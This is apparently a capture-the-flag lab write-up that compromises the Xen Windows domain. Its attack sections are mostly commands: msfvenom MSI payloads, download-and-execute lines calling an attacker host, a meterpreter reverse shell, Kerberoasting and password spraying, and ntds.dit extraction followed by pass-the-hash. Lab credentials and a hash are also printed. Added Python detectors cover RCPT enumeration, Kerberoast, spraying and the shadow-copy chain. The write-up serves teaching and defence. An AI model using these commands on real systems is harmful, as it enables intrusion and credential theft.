
Network Experience:

My observations while working the targets:

Tools:

The recommended tools for this lab were:

Preface:

When I started working this challenge, I knew that I would be dealing with mostly Windows devices. So, my strategy was to compromise the initial foothold system and then use it to discover, attack, and compromise the rest of the network.

Enumeration:

Using Nmap, I scanned the target with service version detection, OS detection, default script scanning and verbose output enabled, saving the results to a file.

Figure 1: Nmap Scan
Figure 2: Default Website
Figure 3: Default Website Source Code
gobuster dir --url https://humongousretail.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -o 10.13.38.12.gobuster -t 40 -k
Figure 4: gobuster Results
Figure 5: /remote Directory
Figure 6: Citrix Login Page
Figure 7: Telnet Session

Breach:

Based on the information I had gathered, I believed that the path to a foothold had to go through the Exchange server. However, I was at a loss as to how to do that, so I had to break down and review the official Xen walkthrough for assistance.

smtp-user-enum -M RCPT -U /usr/share/wordlists/wfuzz/general/megabeast.txt -D humongousretail.com -t 10.13.38.12
Figure 8: smtp-user-enum Results
Figure 9: Body.txt
Figure 10: SET Menu
Figure 11: SET IP & URL Data
Figure 12: Sent Email via swaks
Figure 13: SET Tool Results
Figure 14: Netcat Results
Figure 15: Citrix Logon
Figure 16: Authenticated Account
Figure 17: Launched Application
Figure 18: Windows Desktop
Figure 19: Flag Location
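The foothold above starts with smtp-user-enum walking a wordlist of RCPT TO addresses against the Exchange server, and that activity leaves a very recognisable trace on the mail server. The following detector is an added example written for this article, not code from the write-up or from any of the tools it uses. It assumes a CSV log layout modelled on the Exchange receive-connector protocol log (date-time, connector-id, session-id, sequence-number, local-endpoint, remote-endpoint, event, data, context); the log lines it processes are constructed inside the block, as are the addresses and session ids. The signature it looks for is a source whose RCPT TO commands are answered mostly by 5xx rejections across many distinct recipients, something a legitimate sender with a mistyped address never produces.

```python
"""Flag SMTP sessions that probe many recipients (RCPT TO user enumeration).

Added example; the log layout is an assumption modelled on the Exchange
receive-connector protocol log (CSV: date-time, connector-id, session-id,
sequence-number, local-endpoint, remote-endpoint, event, data, context).
"""
import csv
from collections import defaultdict

FIELDS = ["timestamp", "connector", "session", "seq", "local", "remote",
          "event", "data", "context"]


def make_session(session_id, remote, recipients):
    """Construct the log lines of one SMTP session (sample data, not a real log).

    recipients: list of (address, server_reply) pairs in the order they were tried.
    """
    connector = "MAIL\\Default Frontend MAIL"
    local = "10.13.38.12:25"

    def line(seq, event, data):
        return f"2020-11-02T10:00:00.{seq:03d}Z,{connector},{session_id},{seq},{local},{remote},{event},{data},"

    lines = [line(0, "+", ""), line(1, "<", "EHLO client"),
             line(2, "<", "MAIL FROM:<test@humongousretail.com>")]
    seq = 3
    for addr, reply in recipients:
        lines.append(line(seq, "<", f"RCPT TO:<{addr}>"))
        lines.append(line(seq + 1, ">", reply))
        seq += 2
    return lines


def summarize_rcpt(lines):
    """Per remote IP: accepted/rejected RCPT counts and the distinct addresses probed."""
    pending = {}    # session id -> RCPT TO address still waiting for the server's reply
    stats = defaultdict(lambda: {"accepted": 0, "rejected": 0, "addresses": set()})
    for row in csv.DictReader(lines, fieldnames=FIELDS):
        ip = row["remote"].rsplit(":", 1)[0]
        sess, data = row["session"], row["data"] or ""
        if row["event"] == "<" and data.upper().startswith("RCPT TO:"):
            pending[sess] = data[len("RCPT TO:"):].strip(" <>").lower()
        elif row["event"] == ">" and sess in pending:
            # The first server reply after a RCPT TO is its verdict on that address.
            addr = pending.pop(sess)
            stats[ip]["addresses"].add(addr)
            if data.startswith("5"):
                stats[ip]["rejected"] += 1
            elif data.startswith("250"):
                stats[ip]["accepted"] += 1
    return stats


def flag_enumerators(stats, min_rejections=5, min_reject_ratio=0.5):
    """Sources whose RCPT traffic is mostly rejections: the enumeration signature."""
    flagged = {}
    for ip, s in stats.items():
        total = s["accepted"] + s["rejected"]
        if total and s["rejected"] >= min_rejections and s["rejected"] / total >= min_reject_ratio:
            flagged[ip] = {"rejected": s["rejected"], "accepted": s["accepted"],
                           "distinct": len(s["addresses"])}
    return flagged


# Constructed sample: one source walks a wordlist of addresses (eight unknown, one
# real); a second source sends a normal message and mistypes one recipient.
SAMPLE_LOG = (
    make_session("08D8A1", "10.14.14.10:51234",
                 [(f"user{i}@humongousretail.com", "550 5.1.1 User unknown") for i in range(1, 9)]
                 + [("helpdesk@humongousretail.com", "250 2.1.5 Recipient OK")])
    + make_session("08D8A2", "203.0.113.7:44010",
                   [("helpdesk@humongousretail.com", "250 2.1.5 Recipient OK"),
                    ("helpdsek@humongousretail.com", "550 5.1.1 User unknown")])
)

if __name__ == "__main__":
    for ip, info in flag_enumerators(summarize_rcpt(SAMPLE_LOG)).items():
        print(f"{ip}: {info['rejected']} rejected / {info['accepted']} accepted, "
              f"{info['distinct']} distinct recipients probed")
```

The thresholds are deliberately loose; tune them to the connector's normal rejection rate. On the mitigation side, the same log also shows whether the server answers RCPT TO with distinct codes for unknown and known users, which is what makes the enumeration possible in the first place.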

Deploy:

While enumerating the target, it became obvious that the compromised user's environment was locked down. Since I could not access a Command Prompt or PowerShell from the Start Menu, I tried creating a shortcut to launch a Command Prompt, which was successful.

Figure 20: CMD.EXE Shortcut
Figure 21: Executed Shortcut
iex (New-Object Net.WebClient).DownloadString('http://10.14.14.10/PowerUp.ps1');Invoke-AllChecks
Figure 22: PowerUp Found Abuse
Figure 23: Modified Invoke-PowerShellTcp.ps1
msfvenom -p windows/x64/exec CMD="cmd /c powershell iex(new-object net.webclient).downloadstring('http://10.14.14.10/Invoke-RS.ps1')" -f msi > shell.msi
Figure 24: msfvenom MSI Payload
IEX (New-Object System.Net.WebClient).DownloadFile('http://10.14.14.10/shell.msi', 'C:\windows\system32\spool\drivers\color\shell.msi')
Figure 25: Uploaded shell.msi
Figure 26: Executed shell.msi
Figure 27: Reverse Shell (SYSTEM)
Figure 28: Flag Location

Ghost:

After obtaining SYSTEM on the target, I returned to the user's desktop so that I could enumerate the HTB.Local domain. I identified that the compromised foothold target was a dual-homed system, and reviewing its ARP table gave me additional IP addresses on the second network.

Figure 29: Dual-Homed Network
Figure 30: Network ARP
iex (New-Object Net.WebClient).DownloadString('http://10.14.14.10/PowerView.ps1');Get-NetComputer | ft samaccountname,cn,operatingsystem
Figure 31: Domain Computers
Figure 32: Host to IP Validation
net view \\172.16.249.201\ /all
net use \\172.16.249.201\Citrix$
Figure 33: Network Shares
iex (New-Object Net.WebClient).DownloadString('http://10.14.14.10/PowerView.ps1');get-netuser | ft samaccountname,admincount
Figure 34: Domain Users & Administrators
iex (New-Object Net.WebClient).DownloadString('http://10.14.14.10/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat hashcat
Figure 35: Kerberoastable User (mturner)
cat hash.out | tr -d '[:space:]' > kerb.hash
hashcat -m 13100 -a 0 -w 3 kerb.hash ~/wordlists/rockyou.txt -r /opt/hashcat/rules/OneRuleToRuleThemAll.rule
Figure 36: Cracked Hash
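The Kerberoast step above is loud on the domain controller: every service ticket request is logged as Security event 4769, and Kerberoast tooling asks for RC4 tickets (TicketEncryptionType 0x17) because those crack far faster than AES. The detector below is an added example written for this article, not code from the write-up, from PowerView or from Invoke-Kerberoast. It works on plain dicts carrying the 4769 fields a SIEM exposes; all records are constructed sample data (the IP addresses reuse the write-up's 172.16.249.0/24 range, but their pairing with pmorgan, mturner and the made-up svc_sql, svc_web and jdoe accounts is invented). It shows two complementary checks: a per-event check for RC4 tickets on user-account SPNs, and a burst check that catches a requester pulling tickets for several service accounts within a few minutes even when AES is requested.

```python
"""Spot Kerberoast-style TGS requests in Windows Security event 4769 records.

Added example, not code from the write-up. Each record is a dict carrying the
4769 fields a SIEM exposes; all values are constructed sample data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4-HMAC; AES128/AES256 are 0x11/0x12
T0 = datetime(2020, 11, 2, 14, 0, 0)


def is_user_spn(service_name):
    """Computer accounts end in '$' and krbtgt appears on every TGT renewal; skip both."""
    name = service_name.lower()
    return not name.endswith("$") and name != "krbtgt"


def tgs(offset_s, requester, ip, service, enc=RC4_HMAC):
    """Construct one 4769 record (sample data)."""
    return {"EventID": 4769, "TimeCreated": T0 + timedelta(seconds=offset_s),
            "TargetUserName": requester, "IpAddress": ip, "ServiceName": service,
            "TicketEncryptionType": enc, "Status": "0x0"}


def rc4_tgs_requests(events):
    """Single records worth an alert: an RC4 ticket issued for a user account's SPN.

    In a domain where AES is the norm, each such request stands out on its own.
    """
    return [e for e in events
            if e["EventID"] == 4769 and e["Status"] == "0x0"
            and e["TicketEncryptionType"] == RC4_HMAC and is_user_spn(e["ServiceName"])]


def burst_requesters(events, window=timedelta(minutes=5), min_services=3):
    """(requester, ip) pairs that pulled tickets for many distinct user SPNs in one window.

    Catches the roast even when AES tickets are requested: one principal rarely
    needs several service accounts' tickets within a few minutes.
    """
    by_requester = defaultdict(list)
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        if e["EventID"] == 4769 and is_user_spn(e["ServiceName"]):
            by_requester[(e["TargetUserName"], e["IpAddress"])].append(e)
    flagged = {}
    for key, recs in by_requester.items():
        for i, start in enumerate(recs):
            services = {r["ServiceName"] for r in recs[i:]
                        if r["TimeCreated"] - start["TimeCreated"] <= window}
            if len(services) >= min_services:
                flagged[key] = sorted(services)
                break
    return flagged


# Constructed sample: pmorgan pulls RC4 tickets for three user SPNs inside ten
# seconds (the roast); the remaining rows are ordinary AES traffic.
SAMPLE_EVENTS = [
    tgs(0, "pmorgan@HTB.LOCAL", "172.16.249.201", "mturner"),
    tgs(5, "pmorgan@HTB.LOCAL", "172.16.249.201", "svc_sql"),
    tgs(9, "pmorgan@HTB.LOCAL", "172.16.249.201", "svc_web"),
    tgs(12, "pmorgan@HTB.LOCAL", "172.16.249.201", "DC$", enc="0x12"),
    tgs(30, "jdoe@HTB.LOCAL", "172.16.249.210", "krbtgt", enc="0x12"),
    tgs(45, "jdoe@HTB.LOCAL", "172.16.249.210", "svc_sql", enc="0x12"),
]

if __name__ == "__main__":
    for e in rc4_tgs_requests(SAMPLE_EVENTS):
        print(f"RC4 TGS for {e['ServiceName']} requested by {e['TargetUserName']} from {e['IpAddress']}")
    for (who, ip), services in burst_requesters(SAMPLE_EVENTS).items():
        print(f"{who} from {ip} requested tickets for {', '.join(services)} within 5 minutes")
```

The cracked password in Figure 36 is the other half of the story: the detection only buys time, and the durable fix is long random passwords (or group managed service accounts) for every account that carries an SPN, plus AES-only Kerberos so an RC4 request becomes an anomaly rather than background noise.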
net use \\172.16.249.201\Citrix$ /user:htb.local\mturner '4install!'
Figure 37: Connect Share & Flag (mturner)

Camouflage:

Continuing to enumerate the share, I viewed private.ppk, which appeared to be a PuTTY RSA key. So, I copied its contents and saved them to my attacker system.

Figure 38: PuTTY RSA Key
iex (New-Object Net.WebClient).DownloadString('http://10.14.14.10/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 172.16.249.200 -EndAddress 172.16.249.204 -ScanPort -Port 22
Figure 39: Portscan for TCP 22
IEX (New-Object System.Net.WebClient).DownloadFile('http://10.14.14.10/putty.exe', 'C:\windows\system32\spool\drivers\color\putty.exe')
IEX (New-Object System.Net.WebClient).DownloadFile('http://10.14.14.10/private.ppk', 'C:\users\pmorgan\desktop\private.ppk')
Figure 40: Uploaded Files
Figure 41: PuTTY w/Auth
Figure 42: Initial Security Alert
Figure 43: Failed Authentication
iex (New-Object Net.WebClient).DownloadString('http://10.14.14.10/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 172.16.249.202 -EndAddress 172.16.249.202 -ScanPort -Port 80,443,8080
Figure 44: Port Scan
Figure 45: Default Web Site
Figure 46: PuTTY w/Passphrase
Figure 47: Converted PuTTY Key
putty2john private.ppk > putty.hash
sudo gcc src/kwp.c -o kwp
sudo ./kwp basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route -s 1 -o kb-pattern.lst
Figure 48: kwprocessor Wordlist Creation
john putty.hash -w /home/mbond/wordlists/kb-pattern.lst --format=PuTTY --pot=putty.out
Figure 49: JTR Session
Figure 50: Wordlist Pattern Contents
Figure 51: SSH Connection (nsroot)
Figure 52: Shell Connection (root)
tcpdump -w test.pcap -s0 -v
Figure 53: tcpdump Capture
Figure 54: Python HTTP Server
IEX (New-Object System.Net.WebClient).DownloadFile('http://172.16.249.202:9999/test.pcap', 'C:\windows\system32\spool\drivers\color\test.pcap')
sudo python3 /opt/impacket/examples/smbserver.py loot $(pwd) -smb2support
net use \\10.14.14.10\loot
cp *.pcap \\10.14.14.10\loot\.
Figure 55: SMBServer
Figure 56: SMBServer Share
Figure 57: Capture File (LDAP)
Figure 58: Credentials & Flag

Doppelgänger:

Reviewing my initial domain user enumeration, the netscaler-svc account did not appear to have any elevated privileges. So, I decided to use DomainPasswordSpray.ps1 to determine whether any other domain users shared its password.

iex (New-Object Net.WebClient).DownloadString('http://10.14.14.10/DomainPasswordSpray.ps1');Invoke-DomainPasswordSpray -UserList user.lst -Password '#S3rvice#@cc' -OutFile creds.txt
Figure 59: Successful Password Spraying
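A spray like the one in Figure 59 is designed to stay under the account lockout threshold, so any alert keyed on a single account's failures never fires; what gives it away is one source failing against many different accounts inside a short window. The detector below is an added example written for this article, not code from the write-up or from DomainPasswordSpray.ps1. It processes Security event 4625 (logon failure) records as plain dicts; all records are constructed sample data (the addresses reuse the write-up's 172.16.249.0/24 range, the account names other than those already in the article and their pairing with addresses are invented). It also splits the failures by SubStatus, so you can see whether the attacker's user list came from real directory enumeration (almost entirely "wrong password") or from guessing.

```python
"""Detect password spraying in Windows Security 4625 (logon failure) records.

Added example, not code from the write-up. Records are dicts with the 4625
fields a SIEM exposes; all values are constructed sample data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# 4625 SubStatus codes a spray produces; counting them separately shows whether the
# attacker's user list was built from real names (mostly "wrong password") or guessed.
SUBSTATUS = {"0xc000006a": "wrong password", "0xc0000064": "no such user",
             "0xc0000234": "account locked out", "0xc0000072": "account disabled"}
T0 = datetime(2020, 11, 2, 15, 0, 0)


def fail(offset_s, user, ip, sub="0xC000006A"):
    """Construct one 4625 record (sample data)."""
    return {"EventID": 4625, "TimeCreated": T0 + timedelta(seconds=offset_s),
            "TargetUserName": user, "IpAddress": ip, "SubStatus": sub}


def spray_sources(events, window=timedelta(minutes=10), min_accounts=5, max_per_account=2):
    """Sources that failed against many distinct accounts with only a try or two each.

    The low per-account count is the whole point: a spray stays under the lockout
    threshold, so alerting keyed on one account's failures never fires. The signal
    is the fan-out across accounts from a single source in a short window.
    """
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        if e["EventID"] == 4625:
            by_ip[e["IpAddress"]].append(e)
    flagged = {}
    for ip, recs in by_ip.items():
        for i, start in enumerate(recs):
            in_window = [r for r in recs[i:] if r["TimeCreated"] - start["TimeCreated"] <= window]
            per_account, reasons = defaultdict(int), defaultdict(int)
            for r in in_window:
                per_account[r["TargetUserName"].lower()] += 1
                reasons[SUBSTATUS.get(r["SubStatus"].lower(), r["SubStatus"])] += 1
            if len(per_account) >= min_accounts and max(per_account.values()) <= max_per_account:
                flagged[ip] = {"accounts": sorted(per_account), "reasons": dict(reasons)}
                break
    return flagged


# Constructed sample: one host tries seven accounts once each in twenty seconds (one
# name does not exist); a user elsewhere mistypes their own password three times.
SAMPLE_EVENTS = (
    [fail(3 * i, user, "172.16.249.201")
     for i, user in enumerate(["mturner", "pmorgan", "jdoe", "svc_sql", "svc_web", "administrator"])]
    + [fail(20, "ghost", "172.16.249.201", "0xC0000064")]
    + [fail(100 + 10 * i, "jdoe", "172.16.249.210") for i in range(3)]
)

if __name__ == "__main__":
    for ip, info in spray_sources(SAMPLE_EVENTS).items():
        print(f"{ip}: {len(info['accounts'])} accounts tried, reasons {info['reasons']}")
```

The account the spray actually hit (backup-svc in the article) produces a 4624 success rather than a 4625, so it is invisible to this function; a useful follow-on is to correlate a 4624 from a flagged source arriving in the middle of the fan-out. The spray succeeded because a service account password was reused across accounts, which is the condition to fix.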
iex (New-Object Net.WebClient).DownloadString('http://10.14.14.10/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 172.16.249.200 -EndAddress 172.16.249.204 -ScanPort -Port 3389,5985,5986
Figure 60: Port Scan
$user = 'HTB.LOCAL\backup-svc'
$pass = ConvertTo-SecureString '#S3rvice#@cc' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ($user, $pass)
$sess = New-PSSession -ComputerName DC -Credential $cred
Figure 61: Created Variables
Enter-PSSession $sess
Figure 62: Established Remote Session (backup-svc)
Figure 63: Flag Location

Owned:

Once connected to the DC, it seemed that I did not have DA access. So, I issued whoami /priv to determine the privileges of the backup-svc account.

Figure 64: Backup & Restore Privileges
$file=@'
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "C:\Users\backup-svc\Documents\shadowcopy.cmd"
delete shadows volume %someAlias%
reset
exit
'@
$file | Out-File -FilePath C:\Users\backup-svc\Documents\shadow.txt
$file=@'
cmd.exe /c robocopy /B z:\windows\ntds\ C:\Users\backup-svc\Documents\ ntds.dit
'@
$file | Out-File -FilePath C:\Users\backup-svc\Documents\shadowcopy.cmd
diskshadow /s shadow.txt /l log.txt
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.14.14.10 LPORT=443 -f msi > shell.msi
IEX (New-Object System.Net.WebClient).DownloadFile('http://10.14.14.10/shell.msi', 'C:\windows\system32\spool\drivers\color\shell.msi')
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
set exitonsession false
exploit -j
route add 172.16.249.0/24 1
use auxiliary/server/socks4a
set srvport 9050
run
proxychains evil-winrm -i 172.16.249.200 -u backup-svc -p '#S3rvice#@cc'
unix2dos shadowcopy.cmd
unix2dos shadow.txt
diskshadow /s shadow.txt /l log.txt
Figure 65: Truncated Diskshadow Output (1 of 2)
Figure 66: Truncated Diskshadow Output (2 of 2)
reg.exe save HKLM\SYSTEM system.hive
impacket-secretsdump -ntds ntds.dit -system system.hive -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
Figure 67: Extracted NTDS.dit Hashes
proxychains evil-winrm -i 172.16.249.200 -u administrator -H 822601ccd7155f47cd955b94af1558be
Figure 68: Evil-WinRM Session (Administrator)
Figure 69: Flag Location
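The domain takeover above is a three-step chain on the DC: a shadow copy via diskshadow, a backup-privileged robocopy of ntds.dit out of that copy, and a reg save of the SYSTEM hive to get the boot key that secretsdump needs. Each step is something an administrator might legitimately run, so a useful alert keys on the combination from one account inside a short window, with a direct reference to ntds.dit as the mandatory element. The detector below is an added example written for this article, not code from the write-up; it assumes process command-line auditing is enabled so that Security event 4688 carries the command line (Sysmon event 1 provides the same fields), and it works on plain dict records. All records are constructed sample data; the host name DC and the htb.local domain come from the write-up, the FS01 file server and its svc_backup account are invented.

```python
"""Flag the shadow-copy -> ntds.dit -> SYSTEM hive chain in 4688 process-creation events.

Added example, not code from the write-up. Requires command-line auditing on the
DC (Sysmon event 1 carries the same fields). Records are dicts; all values are
constructed sample data.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each indicator is harmless on its own (admins run diskshadow and reg save); the
# alert fires on the combination, and a mention of ntds.dit is mandatory.
INDICATORS = [
    ("shadow_copy", re.compile(r"diskshadow(\.exe)?\s.*/s\b|vssadmin(\.exe)?\s+create\s+shadow"
                               r"|shadowcopy\s+call\s+create", re.I)),
    ("ntds_access", re.compile(r"ntds\.dit", re.I)),
    ("ntdsutil_ifm", re.compile(r"ntdsutil(\.exe)?\s.*\bifm\b", re.I)),
    ("system_hive", re.compile(r"reg(\.exe)?\s+save\s+hklm\\system\b", re.I)),
]
T0 = datetime(2020, 11, 2, 16, 0, 0)


def proc(offset_s, computer, user, command_line):
    """Construct one 4688 record (sample data)."""
    return {"EventID": 4688, "TimeCreated": T0 + timedelta(seconds=offset_s),
            "Computer": computer, "SubjectUserName": user, "CommandLine": command_line}


def classify(command_line):
    """Names of the indicators whose pattern matches this command line."""
    return {name for name, rx in INDICATORS if rx.search(command_line)}


def ntds_theft_chains(events, window=timedelta(minutes=30)):
    """(computer, user) pairs whose commands touched ntds.dit plus at least one other
    indicator inside the window, with the matching indicators and command lines."""
    hits = defaultdict(list)
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        if e["EventID"] != 4688:
            continue
        cats = classify(e["CommandLine"])
        if cats:
            hits[(e["Computer"], e["SubjectUserName"])].append((e["TimeCreated"], cats, e["CommandLine"]))
    flagged = {}
    for key, recs in hits.items():
        for i, (t0, _, _) in enumerate(recs):
            in_window = [r for r in recs[i:] if r[0] - t0 <= window]
            cats = set().union(*(r[1] for r in in_window))
            if "ntds_access" in cats and len(cats) >= 2:
                flagged[key] = {"indicators": sorted(cats), "commands": [r[2] for r in in_window]}
                break
    return flagged


# Constructed sample: the write-up's chain as it would appear on the DC, plus a
# legitimate backup job on a file server that creates a shadow copy and nothing else.
SAMPLE_EVENTS = [
    proc(0, "DC.htb.local", "backup-svc", r"diskshadow /s shadow.txt /l log.txt"),
    proc(15, "DC.htb.local", "backup-svc",
         r"cmd.exe /c robocopy /B z:\windows\ntds\ C:\Users\backup-svc\Documents\ ntds.dit"),
    proc(60, "DC.htb.local", "backup-svc", r"reg.exe save HKLM\SYSTEM system.hive"),
    proc(300, "FS01.htb.local", "svc_backup", r"vssadmin create shadow /for=D:"),
    proc(320, "FS01.htb.local", "svc_backup", r"robocopy /B D:\shares E:\backup /MIR"),
]

if __name__ == "__main__":
    for (host, user), info in ntds_theft_chains(SAMPLE_EVENTS).items():
        print(f"{user} on {host}: {', '.join(info['indicators'])}")
        for cmd in info["commands"]:
            print("   ", cmd)
```

The root cause in Figure 64 is that a sprayable service account held SeBackupPrivilege on a domain controller, which is equivalent to domain admin. Membership of Backup Operators (and any other group that grants that privilege on DCs) deserves the same review cadence as Domain Admins, and the robocopy /B in the sample is exactly the kind of privileged read that privilege makes possible.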

References:

https://docs.microsoft.com/en-us/Exchange/mail-flow/test-smtp-with-telnet?view=exchserver-2019

Disclaimer:

This article is made available for educational purposes only!!! In addition, this article provides general information on cyber security topics used for “Ethical Hacking”.
